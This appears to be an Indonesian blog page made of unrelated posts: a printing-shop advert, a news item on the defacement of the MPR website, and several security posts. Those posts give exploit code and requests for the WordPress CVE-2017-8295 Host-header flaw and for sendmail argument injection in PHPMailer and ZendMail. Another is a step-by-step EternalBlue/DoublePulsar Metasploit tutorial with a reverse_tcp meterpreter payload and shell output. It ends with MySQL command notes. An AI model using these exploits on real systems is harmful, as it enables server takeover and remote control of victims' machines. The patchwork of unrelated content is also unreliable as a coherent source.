Tempatnya Percetakan Murah di Jakarta

11.14 Add Comment
Tempatnya Percetakan Murah di Jakarta

Percetakan Murah di Jakarta

Jasa percetakan murah di jakarta merupakan suatu industri yang melayani proses produksi gambar maupun tulisan secara massal. Era digital seperti sekarang jasa percetakan murah di jakarta cukup berperan penting dalam memenuhi kebutuhan, terutama kebutuhan cetak. Apa yang ada dalam kehidupan Anda banyak yang berasal dari hasil jasa cetak. Koran, majalah, buku, spanduk, poster, brosur, banner, dan lainnya merupakan hasil dari jasa percetakan dalam jumlah besar. Sebenarnya Anda pun pernah melakukan jasa cetak sendiri yaitu saat Anda mencetak dokumen penting Anda dengan menggunakan printer. Selain itu, Anda pun mungkin pernah membeli jasa percetakan murah di jakarta untuk mencetak buku atau tugas lain dari tempat kerja Anda. Oleh karena itu, di kota besar khususnya Jakarta Timur ini, pasti telah banyak berdiri tempat jasa percetakan murah di Jakarta Timur.
percetakan murah di jakarta
Telah banyak berdiri jasa percetakan murah di Jakarta Timur dengan penawaran yang beraneka ragam. Masyarakat akan mencari jasa percetakan murah di jakarta yang memberikan kualitas baik dan menyediakan pelayanan yang lengkap. Agar Anda mudah untuk memilih suatu jasa percetakan murah di jakarta, berikut ada beberapa hal yang perlu dipertimbangkan sebelum memilih tempat jasa percetakan murah di Jakarta Timur.

Memilih sesuai kebutuhan

Sebelum Anda mengambil keputusan untuk menentukan jasa percetakan mana yang akan digunakan, Anda perlu mempertimbangkan jasa percetakan yang disesuaikan dengan kebutuhan Anda. Anda tetap harus mempertimbangkan apa yang akan dicetak dengan jasa percetakannya. Blanko, kartu, buku, spanduk, poster, brosur, atau media lain yang perlu dicetak dalam jumlah besar dan membutuhkan jasa percetakan yang tepat. Hal ini sangat penting untuk dipertimbangkan agar hasilnya memenuhi tujuan.
 

Pelayanan yang lengkap

Masyarakat lebih menyukai tempat penjual jasa yang memiliki pelayanan lengkap agar kebutuhannya dapat terpenuhi dalam sekali waktu tanpa harus berpindah-pindah tempat. Memiliki pelayanan yang lengkap menjadi nilai tambah bagi tempat jasa percetakan. Sehingga masyarakat akan menjadikan tempat pelayanan itu menjadi pilihan utama saat akan menggunakan jasa tersebut. Di era sekarang, apabila menjalankan sebuah bisnis, perlu adanya pelayanan yang lengkap karena sekarang segala kebutuhan masyarakat cukup beraneka ragam. Jika suatu jasa percetakan murah di jakarta memiliki pelayanan yang tidak lengkap, maka masyarakata tidak akan merekomendasikan tempat itu sebagai jasa cetak yang baik. Masyarakat cenderung akan merubah pilihannya kepada jasa percetakan murah di jakarta yang tidak lengkap. Begitu juga dengan Anda, lebih mencari tempat jasa percetakan murah di jakarta dengan pelayanan yang lengkap.
 
 percetakan murah di jakarta

Sesuaikan dengan lokasi dan biaya

Anda tentu mempertimbangkan lokasi dan biaya sebelum mencetak di jasa percetakan murah di jakarta. Jasa percetakan yang dipilih pasti yang menawarkan biaya murah dan lokasi dapat dijangkau. Hal ini berkaitan dengan biaya atau budget yang Anda miliki, ketika harus memakai jasa cetak namun budget minim. Kondisi tersebut membuat Anda berpikir untuk mencari jasa percetakan yang lokasinya lebih dengan Anda. Selain untuk meminimalkan budget, menghemat biaya adalah hal yang utama. Anda bisa menggunakan budget itu untuk tambahan biaya cetak. Sehingga hasilnya lebih maksimal pada proses mencetak media sesuai dengan tugas Anda. Oleh karena itu, pertimbangan harga dan lokasi itu sangat penting dan perlu Anda perhatikan.
 
Tempat jasa percetakan murah di Jakarta Timur itu cukup beraneka ragam, tetapi Anda perlu memilih toko Republik Digital Printing. Toko ini merupakan tempat jasa percetakan murah di Jakarta Timur dengan memberikan pelayanan yang memiliki kualitas terbaik, pelayanan lengkap, dan harga murah, serta lokasinya pun terjangkau.
 
 
 percetakan murah di jakarta

Kami dari Republik Digital Printing menyediakan beberapa jenis percetakan murah di jakarta, berikut beberapa daftar jenis jasa percetakan murah di jakarta yang kami sediakan :

JASA CETAK SPANDUK/BACKDROP/BALIHO | CETAK UMBUL-UMBUL | CETAK X/Y-BANNER | CETAK ROLL UP BANNER | CETAK BROSUR | CETAK POSTER | CETAK KARTU NAMA | CETAK KOP SURAT | CETAK SERTIFIKAT/PIAGAM PENGHARGAAN | CETAK CUTTING STICKER | STIKER CHROMO | STIKER VINYL | CETAK UNDANGAN PERNIKAHAN/KHITANAN | CETAK PLOTTER A0 – A3 | BIKIN PIN | MUG CUSTOM | CETAK KATALOG | CETAK FAKTUR/KWITANSI/SURAT JALAN | CETAK KALENDER | CETAK BUKU TAHUNAN SEKOLAH | CETAK CONTINOUS FORM | CETAK STAMPLE/STEMPEL | CETAK BUKU YASIN | CETAK MAP | JASA PRINT WARNA/HITAM PUTIH A0,A1,A2 | JASA PRINT DIGITAL A3+ | JILID SKRIPSI | JILID SOFT COVER | JILID HARD COVER | CETAK BOOKLET | DESIGN GRAPICH | DLL.
 

BAHAN OUTDOOR:

BACKLITE CHINA/KOREA | FLEXI KOREA 440 | FLEXI KOREA 380 | FLEXY CHINA
KAIN VINYL | STICKER RITRAMA | STICKER DURATAC | STICKER TRANSPARANT | KANVAS |

BAHAN INDOOR : 

ALBATROS | PHOTO PAPER | LUSTER | HVS |  STICKER RITRAMA | STICKER DURATAC | STICKER TRANSPARANT | KANVAS |

BAHAN KONICA MINOLTA (A3) :

ART CARTON 260 | ART CARTON 230 | ART CARTON 210 | ART CARTON 190 | ART PAPER 150 | ART PAPER 120 | HVS 100 | LINEN | CONCORDE | BW | TIK | STICKER VINYL WHITE | STICKER VINYL TRANSPARANT | CROMO |

Kami Juga Melayani Pesanan Luar Jakarta Bogor Depok Tangerang Bekasi via Kurir Seperti :

Jawa Barat :
Bandung, Banjar, Ciamis, Cianjur, Cimahi Cirebon, Garut, Indramayu, Karawang, Kuningan, Majalengka, Purwakarta, Subang, Sukabumi, Sumedang, Tasikmalaya.
 
Jawa Tengah :
Banjarnegara, Banyumas, Batang, Blora, Boyolali, Brebes, Cilacap, Demak, Grobogan, Jepara, Karanganyar, Kebumen, Kendal, Klaten, Kudus, Magelang, Pati, Pekalongan, Pemalang, Purbalingga, Purworejo, Rembang, Salatiga, Semarang, Sragen, Sukoharjo, Surakarta, Tegal, Temanggung, Wonogiri, Wonosobo, Purwokerto.
 
Jawa Timur :
Bangkalan, Banyuwangi, Batu, Blitar, Bojonegoro, Bondowoso, Gresik, Jember, Jombang, Kediri, Lamongan, Lumajang, Madiun, Magetan, Malang, Mojokerto, Nganjuk, Ngawi, Pacitan, Pamekasan, Pasuruan, Ponorogo, Probolinggo, Surabaya, Sampang, Sidoarjo, Situbondo, Sumenep, Trenggalek, Tuban, Tulungagung, DI Yogyakarta.
 
untuk anda yang berminat menggunakan Jasa Percetakan murah di jakarta Republik Digital Printing anda bisa hubungi kami di :
Workshop
Jl. Raya Bogor No.49, RT.6/RW.2, Pekayon, Ps. Rebo, Cibubur, Kota Jakarta Timur, Daerah Khusus Ibukota Jakarta 13710

Situs MPR RI Diretas, Hacker Beri Dukungan Kepada Ahok

05.06 Add Comment
kali ini peretasan dengan motif dukungan terhadap Ahok kembali melanda situs pemerintahan Indonesia. Baru saja situs Majelis Permusyawaratan Rakyat disambangi hacker yang tidak mengungkapkan kodenama nya. Saat diakses, situs yang beralamat di mpr.go.id tersebut berubah menjadi latar hitam dengan tulisan #PRAYFORINDONESIANJUSTICE .
Saat dibuka, awalnya situs mpr.go.id nampak normal namun kemudian berubah dengan tampilan deface. Kemungkinan pelaku menggunakan JS Overlay untuk "menutupi" tampilan asli laman situs MPR RI dengan javascript yang disimpan di https://pastebin.com/raw/RPhVFPXU dan script deface yang di host di alamat https://name-server.ml/justiceforindonesia.html .
Berikut pesan yang ditinggalkan pelaku :
#PRAYFORINDONESIANJUSTICE

"Kalian semua mungkin bisa penjarakan saya, tapi kalian ngga akan bisa penjarakan ide-ide saya..." - Basuki Tjahaja Purnama
Peretasan seperti ini tentu sangat disayangkan karena akan mengganggu kinerja situs situs pemerintahan. Namun meskipun banyak yang kontra tidak sedikit pula orang yang mendukung aksi hacker seperti ini. Mereka menilai cara "berdemo" dengan meretas situs pemerintahan lebih berimbas daripada harus turun ke jalan.

SUMBER : news.linuxsec.org

Kerentanan WordPress Unauthorized Password Reset [CVE-2017-8295] + Proof of Concept

11.56 Add Comment


Sebuah kerentanan dalam salah satu CMS populer di dunia, yakni WordPress, kali ini dipublikasikan oleh salah satu pakar keamanan. Kerentanan WordPress (CVE-2017-8295) ini juga ternyata mempengaruhi semua versi, termasuk versi terbarunya 4.7.4.
Kerentanan WordPress ini ditemukan oleh peneliti keamanan Polandia, Dawid Golunski dari Legal Hackers tahun lalu pada bulan Juli. Dan ia pun sebenarnya sudah melaporkan kerentanan ini ke tim keamanan WordPress.
Namun ternyata, tim yang berwenang tersebut memutuskan untuk mengabaikan masalah ini. Sehingga saat ini, jutaan situs web yang menggunakan CMS tersebut mempunyai resiko atas kerentanan ini.
Golunski adalah peneliti yang sama yang menemukan kerentanan kritis di library salah satu project open-source populer, yaitu PHPMailer.
Kerentanan ini terletak pada cara WordPress memproses permintaan reset kata sandi untuk pengguna.

Secara umum, ketika pengguna meminta untuk menyetel ulang kata sandinya melalui opsi lupa kata sandi, WordPress segera menghasilkan kode rahasia yang unik dan mengirimkannya ke ID email pengguna yang sudah tersimpan di database.

Kerentanan WordPress Apa Ini?

 ------[ wp-includes/pluggable.php ]------

...

if ( !isset( $from_email ) ) {
        // Get the site domain and get rid of www.
        $sitename = strtolower( $_SERVER['SERVER_NAME'] );
        if ( substr( $sitename, 0, 4 ) == 'www.' ) {
                $sitename = substr( $sitename, 4 );
        }

        $from_email = 'wordpress@' . $sitename;
}

...

-----------------------------------------


Saat mengirim email ini, WordPress menggunakan variabel bernama SERVER_NAME agar mendapatkan nama host server untuk menetapkan nilai dari bidang From/Return-Path.
Di sini, “From” mengacu pada alamat email pengirim dan “Return-Path” mengacu pada alamat email di mana email ‘bounce-back’ harus dikirimkan jika terjadi kegagalan dalam pengiriman karena alasan tertentu.
Menurut Golunski, penyerang dapat mengirim permintaan HTTP palsu dengan hostname value standar yang telah ditetapkan (misalnya attacker-mxserver.com), saat memulai proses reset kata sandi untuk user admin yang ditargetkan.
Karena nama host dalam permintaan HTTP berbahaya adalah domain yang dikendalikan oleh penyerang, bidang From and Return-Path di email reset kata sandi akan dimodifikasi untuk menyertakan ID email yang terkait dengan domain penyerang, yaitu wordpress@attacker-mxserver.com, Bukan wordpress@victim-domain.com.
Karena header HOST yang dimodifikasi, SERVER_NAME akan diset ke nama host pilihan penyerang. Akibatnya, WordPress akan melewati header dan body email berikut ke wrapper /usr/bin/sendmail,” kata Golunski.
Kamu harus mencatat bahwa email penyetelan ulang kata sandi akan dikirim ke alamat email korban saja, namun karena bidang From and Return-Path sekarang mengarah ke ID email penyerang, penyerang juga dapat menerima kode reset berdasarkan skenario berikut:
  1. Jika dalam kasus ini korban membalas email tersebut, email tersebut akan dikirim ke ID email penyerang (yang disebutkan dalam bidang ‘From’), yang berisi tautan setel ulang kata sandi dalam riwayat pesan.
  2. Jika, untuk beberapa kasus, server email korban sedang down, email reset password akan secara otomatis bounce-back ke alamat email yang disebutkan di bidang “Return-Path”, yang menunjuk ke kotak masuk penyerang.
  3. Dalam skenario lain, untuk secara paksa mengambil email bounce-back, penyerang dapat melakukan serangan DDoS terhadap server email korban atau mengirim sejumlah besar email, sehingga akun email korban tidak dapat lagi menerima email apapun.
Untuk alasan yang jelas, ini bukan metode penyerangan yang pasti, namun dalam kasus serangan yang ditargetkan, peretas handal akan berhasil memanfaatkan kelemahan ini dengan sukses.
Fakta penting lainnya tentang eksploitasi kerentanan ini, walaupun situs WordPress nya rentan, tidak semua server web mengizinkan penyerang untuk mengubah nama host melalui header SERVER_NAME loh, termasuk WordPress yang di host dalam share server manapun.
Header server SERVER_NAME dapat dimanipulasi pada konfigurasi default server Web Apache (deployment WordPress yang paling umum) melalui header HOST dari permintaan HTTP,” kata Golunski.

Proof of Concept

  • Discovered by: Dawid Golunski
  • dawid[at]legalhackers.com
  • https://legalhackers.com
  • ExploitBox.io (@Exploit_Box)
  • CVE-2017-8295
  • Release date: 03.05.2017
  • Last update: 04.05.2017
  • Severity: Medium/High
Jika penyerang mengirimkan permintaan mirip dengan yang ada di bawah ini ke instalasi WordPress default yang dapat diakses oleh alamat IP (IP-based vhost):

-----[ HTTP Request ]----

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

------------------------


WordPress akan memicu fungsi reset password untuk akun pengguna admin.
Karena header HOST yang dimodifikasi, SERVER_NAME akan disetel ke nama host pilihan penyerang. Akibatnya, WordPress akan pass header dan body email berikut ke wrapper /usr/bin/sendmail:

------[ resulting e-mail ]-----

Subject: [CompanyX WP] Password Reset
Return-Path: <wordpress@attackers-mxserver.com>
From: WordPress <wordpress@attackers-mxserver.com>
Message-ID: <e6fd614c5dd8a1c604df2a732eb7b016@attackers-mxserver.com>
X-Priority: 3
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit


Seseorang meminta agar password direset untuk akun berikut:

http://companyX-wp/wp/wordpress/

Username: admin


Jika ini salah, abaikan saja email ini dan tidak akan terjadi apa-apa.
Untuk mereset kata sandi Anda, kunjungi alamat berikut ini:

<http://companyX-wp/wp/wordpress/wp-login.php?action=rp&key=AceiMFmkMR4fsmwxIZtZ&login=admin>

-------------------------------


Seperti yang bisa kita lihat, field Return-Path, From, dan Message-ID, semuanya di set menjadi domain penyerang.
Verifikasi header dapat dilakukan dengan mengganti /usr/sbin/sendmail dengan script bash dari:

#!/bin/bash
cat > /tmp/outgoing-email


Sampai artikel ini dipublish, belum ada patch resmi yang tersedia untuk kerentanan WordPress ini. Sebagai solusi sementara, untuk kamu yang juga menggunakan CMS WordPress, dapat mengaktifkan UseCanonicalName untuk menerapkan nilai SERVER_NAME statis.

Proof-of-Concept Kerentanan Kritis RCE Dalam SwiftMailer, PhpMailer dan ZendMail

11.44 Add Comment


Kemarin-kemarin sudah ditemukan kerentanan kritis remote code execution di salah satu library open source PHP populer. Yang mana library tersebut digunakan untuk mengiri email. Dan kerentanan tersebut memungkinkan penyerang untuk mengeksekusi remote kode arbitrary dalam konteks web server. Juga dapat mengganggu aplikasi web. Selain kerentanan itu, Golunski juga melaporkan kerentanan yang sama di dua mailing library lain untuk PHP. Yaitu SwiftMailer dan ZendMail. Yang mana kerentanan ini juga menyebabkan serangan remote code execution.

Kerentanan Kritis Remote Code Execution di SwiftMailer

SwiftMailer merupakan sebuah library PHP yang sudah digunakan oleh banyak proyek open-source populer. Seperti Yii2, LARAVEL, dan Symfony untuk mengirim email melalui SMTP.
Kerentanan di SwiftMailer ini dapat dimanfaatkan dengan cara yang sama seperti kerentanan PHPMailer. Yaitu dengan menargetkan komponen situs web yang menggunakan SwiftMailer class. Seperti form kontak / pendaftaran, password email reset form, dan sebagainya.
Kerentanan ini memungkinkan penyerang untuk mengeksekusi kode arbitrary dari jarak jauh dalam konteks web server. Yang mana bisa lebih dimanfaatkan untuk mengakses web server hosting aplikasi web yang menggunakan versi rentan dari library SwiftMailer ini. Kerentanan ini mempengaruhi semua versi dari library, termasuk rilisan versi 5.4.5-DEV.

Golunski sudah melaporkan kerentanan ini ke tim teknisi SwiftMailer. Dan para pengembangnya pun langsung bertindak cepat untuk memperbaiki celah ini. Lalu meluncurkan patch versi 5.4.5 hanya dalam satu hari.
Mail transportasi (Swift_Transport_MailTransport) adalah kerentanan melewati argumen shell arbitrary if “From,” “ReturnPath” atau “Sender” header yang berasal dari sumber tidak dipercaya. Berpotensi untuk memungkinkan remote code execution“, baca lebih lanjut mengenai hal ini di changelog untuk SwiftMailer dalam GitHub.

Kerentanan Kritis Remote Code Execution di ZendMail

Dengan menginjeksi urutan ekstra \” setelah argumen pertama, email berikut:

"Attacker \" -Param2 -Param3"@test.com

Ketika melewati transportasi sendmail Zend-mail ( dan pada akhirnya ke fungsi mail() ) akan menyebabkan sendmail untuk mengeksekusi:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]

Seperti yang dapat dapat kamu lihat, hal tersebut akan menyuntikkan parameter tambahan 4 & 5 untuk sendmail.

A simple PoC (working on Sendmail MTA)

Hal ini akan menginjeksi parameter berikut untuk perintah sendmail:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-r]
Arg no. 4 == [attacker\]
Arg no. 5 == [-oQ/tmp/]
Arg no. 6 == [-X/var/www/cache/phpcode.php]
Arg no. 7 == ["@email.com]

Yang akan menulis transfer log (X) ke dalam file /var/www/cache/phpcode.php.
Note: /var/www/cache harus ditulis oleh www-data web user.
File yang dihasilkan akan berisi muatan yang sah dalam body message:

09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<

Exploit Code: 

// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender/body fields

$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// encoded phpinfo() php code
$msg_body = base64_decode("PD9waHAgcGhwaW5mbygpOyA/Pg==");

// ------------------

// mail() param injection via the vulnerability in zend-mail

chdir(dirname(__DIR__));
include 'vendor/Zend/Loader/AutoloaderFactory.php';

Zend\Loader\AutoloaderFactory::factory(array(
        'Zend\Loader\StandardAutoloader' => array(
                'autoregister_zf' => true
        )
));

Zend\Mvc\Application::init(require 'config/application.php')->run();

$message        = new \Zend\Mail\Message();

$message->setBody($msg_body);
$message->setFrom($email_from, 'Attacker');
$message->addTo('support@localhost', 'Support');
$message->setSubject('Zend PoC');

$transport  = new \Zend\Mail\Transport\Sendmail();
$transport->send($message);


ZendMail merupakan komponen yang populer di kalangan framework pemograman PHP. Yang mana sudah lebih dari 95 juta website menggunakan ZendMail.
Kerentanan kritis di ZendMail juga dapat dimanfaatkan dengan cara yang sama seperti yang ditemukan dalam PHPMailer dan SwiftMailer. Dengan menargetkan komponen situs web yang menggunakan ZendMail, seperti form kontak / pendaftaran, password email reset form, dan sebagainya.
Dalam kerentanan ini penyerang bisa memperoleh remote code execution dalam konteks web server. Dan bisa mengganggu aplikasi web target yang menggunakan versi rentan dari ZendMail.

Kecatatan Kritis PHPMailer Membuat Jutaan Website Memiliki Kerentanan Remote Exploit

11.32 Add Comment


Sebuah kerentanan kritis kali ini ditemukan di PHPMailer. Yang mana PHPMailer ini merupakan salah satu library open source PHP populer untuk mengirim email. Dan saat ini sudah tercatat sudah digunakan oleh lebih dari 9 juta user di seluruh dunia. Kerentanan PHPMailer yang kali ini ditemukan membuat jutaan website jadi memiliki kerentanan.
Jutaan website tersebut termasuk aplikasi web open source populer. Diantaranya WordPress, Drupal, 1CRM, SugarCRM, Yii, dan Joomla yang dilengkapi dengan library PHPMailer. Yang mana biasanya library ini bertujuan untuk mengirim email menggunakan berbagai metode. Termasuk SMTP untuk para usernya.
Kerentanan ini ditemukan oleh peniliti keamanan Polandia, Dawid Golunski dari Legal Hacker. Kerentanan kritis (CVE-2016-10033) ini memungkinkan penyerang meremote eksekusi kode arbitrary dalam konteks web server. Serta mengganggu aplikasi web target.
Untuk mengeksploitasi kerentanan, penyerang bisa menargetkan komponen website umum. Seperti formulir kontak/umpan balik, formulir pendaftaran, reset password email dan lain-lain. Yang mengirimkan email dengan bantuan versi yang rentan dari PHPMailer class,” Tulis Golunski dalam konsultasinya.

Golunski sudah melaporkan kerentanan ini kepada para pengembangnya. Dan kerentanan ini pun sudah diperbaiki dalam rilisan baru mereka, PHPMailer 5.2.18.
Semua versi dari PHPMailer dibawah versi PHPMailer 5.2.18 terpengaruh oleh kerentanan ini. Jadi para administrator web dan pengembang web yang menggunakan PHPMailer, sangat dianjurkan untuk mengupdate ke versi yang sudah memperbaiki kerentanan ini.

Masih Banyak Website Yang Memiliki Kerentanan Baru Ini

Saat artikel ini kami publish, masih banyak website yang belum mengupdate PHPMailer mereka. Dan masih tercatat jutaan website yang menggunakan PHPMailer masih memiliki kerentanan baru ini.
Namun, Golunski telah berjanji untuk merilis rincian lebih mengenai teknis tentang kerentanan ini dalam beberapa hari mendatang. Termasuk proof-of-concept exploit code dan video demonstrasinya.
Ketika para peniliti mempublikasikan hal tersebut, kami akan memperbarui artikel ini dengan informasi tambahan tentang kerentanan PHPMailer ini. Tentu juga, dengan exploit code dan video demonstrasinya.

Update: Exploit Code Untuk PHPMailer RCE Sudah Dipublikasikan

  • PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
  • Discovered/Coded by: Dawid Golunski (@dawid_golunski) – https://legalhackers.com
Sebuah PoC sederhana (bekerja pada Sendmail MTA) ini akan menginjeksi parameter berikut untuk perintah sendmail:

Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == [some"@email.com]


Yang mana akan menulis transfer log (-X) ke dalam file /var/www/cache/phpcode.php. File yang dihasilkan akan berisi muatan yang sah dalam isi pesan:


09607 <<< --b1_cb4566aa51be9f090d9419163e492306
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
09607 <<< --b1_cb4566aa51be9f090d9419163e492306--


Inputan penyerang berasal dari sumber yang tidak dipercaya seperti $ _GET, $ _POST d.l.l. Misalnya dari form kontak.


$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php  some"@email.com';
$msg_body  = "<?php phpinfo(); ?>";


mail() param injection via kerentanan dalam PHPMailer.


require_once('class.phpmailer.php');
$mail = new PHPMailer(); // defaults to using php "mail()"

$mail->SetFrom($email_from, 'Client Name');

$address = "customer_feedback@company-X.com";
$mail->AddAddress($address, "Some User");

$mail->Subject    = "PHPMailer PoC Exploit CVE-2016-10033";
$mail->MsgHTML($msg_body);

if(!$mail->Send()) {
  echo "Mailer Error: " . $mail->ErrorInfo;
} else {
  echo "Message sent!\n";
}

Jika pengeksploitasian sukses, maka hal tersebut bisa membiarkan penyerang dari jarak jauh mendapatkan akses ke server target. Sebuah akses dalam konteks account web server yang dapat memberikan suatu kompromi penuh atas aplikasi web,” kata Golunski.
SUMBER : errorcybernews.com 

SMB Remote Code Execution (MS17-010) Eternalblue and Doublepulsar Exploit

14.09 Add Comment
Kayaknya lagi rame ya exploit ini. Lumayan telat sih kalo saya baru nulis sekarang. kemarin kemarin pun sebenernya males nulis karena udh banyak yang bahas. Berhubung tadi ada yang nanya tentang tutorial ini yaudah biar sekalian blog ada isinya.


Exploit ini sebenarnya adalah "private exploit" milik NSA yang berhasil dibocorkan yaitu shadowbroker.

Doublepulsar adalah backdoor yang menginjeksi dan menjalankan kode berbahaya di system operasi target, dan ini diinstall menggunakan exploit Eternalblue yang menyerang service SMB file-sharing. Mirip seperti MS08_067 yang menyerang Windows XP dan Windows Server 2003, MS17-010 yang bersifat remote exploit ini juga tidak membutuhkan backdoor yang harus diinstall secara manual (payload yang diklik oleh korban). Syaratnya, di sistem target service SMB sedang berjalan.
Berikut list sistem operasi Windows yang terinfeksi :
Windows XP (all services pack) (x86) (x64)
Windows Server 2003 SP0 (x86)
Windows Server 2003 SP1/SP2 (x86)
Windows Server 2003 (x64)
Windows Vista (x86)
Windows Vista (x64)
Windows Server 2008 (x86)
Windows Server 2008 R2 (x86) (x64)
Windows 7 (all services pack) (x86) (x64)

Okelah langsung saja apa yang peru disiapkan.
Wine dan NET Framework
Metasploit

Sebelumnya update metasploit terlebih dahulu. Karena di metasploit terbaru sudah ada module scanner untuk MS17-010 .
sudo msfupdate
Semuanya sudah siap? Oke sekarang kita coba download exploit nya.
su
cd ~
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
cd cd Eternalblue-Doublepulsar-Metasploit/
cp eternalblue_doublepulsar.rb /opt/metasploit-framework/modules/exploit/windows/smb/

Oke waktunya beraksi (lebay wkwkwk).
Dalam tutorial ini ip target yang digunakan adalah 192.168.48.153. Silahkan sesuaikan sendiri ya.
msfconsole
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.48.153
run
Nah jika target nya vuln akan muncul notis yang menunjukkan informasi sistem operasi yang berjalan beserta arsitektur yang dipakai.
Liat gambar aja lebih jelas nya :


Oke target sudah dipastikan vuln. Sekarang kita exploit.
use exploit/windows/smb/eternalblue_doublepulsar
show options

untuk DOUBLEPULSARPATH dan ETERNALBLUEPATH sesuaikan dengan lokasi dimana kalian mendownload file di github nya tadi ya. Itulah kenapa diatas saya ngeclone ke folder root biar gak perlu ngeganti path lagi.
Untuk WINEPATH ya isi dengan drive_c dari wine mu. Gak perlu dijelasin lagi. TARGETARCHITECTURE juga harus diperhatikan karena akan berpengaruh saat proses pembuatan backdoor.
Untuk payload secara default menggunakan arsitektur x86 (windows/meterpreter/reverse_tcp) .
Namun jika targetmu menggunakan 64bit ubah dengan perintah
set payload windows/x64/meterpreter/reverse_tcp
untuk lhost dan lport sesuaikan sendiri.
Kalau sudah oke, langsung jalankan exploit nya.
Contoh output :
msf exploit(eternalblue_doublepulsar) > run

[*] Started reverse TCP handler on 192.168.48.1:4444
[*] 192.168.48.153:445 - Generating Eternalblue XML data
[*] 192.168.48.153:445 - Generating Doublepulsar XML data
[*] 192.168.48.153:445 - Generating payload DLL for Doublepulsar
[*] 192.168.48.153:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 192.168.48.153:445 - Launching Eternalblue...
[+] 192.168.48.153:445 - Backdoor is already installed
[*] 192.168.48.153:445 - Launching Doublepulsar...
[*] Sending stage (957487 bytes) to 192.168.48.153
[*] Meterpreter session 2 opened (192.168.48.1:4444 -> 192.168.48.153:49166) at 2017-05-03 13:41:54 +0700
[+] 192.168.48.153:445 - Remote code executed... 3... 2... 1...

meterpreter > sysinfo
Computer        : WIN-KPGGKF4MPSR
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > 


Oke cukup jelas kan ? Sekian tutorial kali ini, jika ada yang kurang jelas silahkan komentar.

SUMBER : linuxsec.org

MySQL: Catatan Beberapa Perintah Penting

23.49 Add Comment
Database merupakan komponen yang sangat membantu dalam sebuah web server maupun banyak aplikasi. Pemakaiannya biasanya tidak terbayang oleh banyak orang karena tersamar oleh coding yang dilakukan oleh programmer. Pada kesempatan ini, akan di jelaskan beberapa perintah yang sangat penting yang banyak digunakan pada database MySQL.
Untuk belajar cara kerja database kita sebetulnya tidak perlu melakukan coding menggunakan bahasa apapun. Database MySQL & sqlite mempunyai bahasa untuk mengakses-nya yang relatif standard. Beberapa contoh perintah yang banyak digunakan antara lain adalah,
  • create database database01;
  • grant CREATE, INSERT, SELECT, DELETE, UPDATE on namadatabase.* to username@localhost IDENTIFIED BY 'passworduser';
  • create table table01 (field01 integer, field02 char(10));
  • show tables;
  • insert into table01 (field01, field02) values (1, 'first');
  • select * from table01;
  • quit



Perintah-perintah di atas biasanya nantinya digunakan pada saat kita melakukan pemrogramman database menggunakan berbagai bahasa, baik itu PHP, python, java dll.
Untuk masuk database, saya biasanya menggunakan shell (terminal) karena jauh lebih aman daripada menggunakan phpmyadmin lewat web, karena bisa dengan mudah di hack. Perintah yang diketik di shell adalah "mysql -u root -p123456" dimana 123456 adalah password root dari MySQL.
Terlampir adalah rekaman video saat mengoperasikan ngoprek database MySQL di terminal.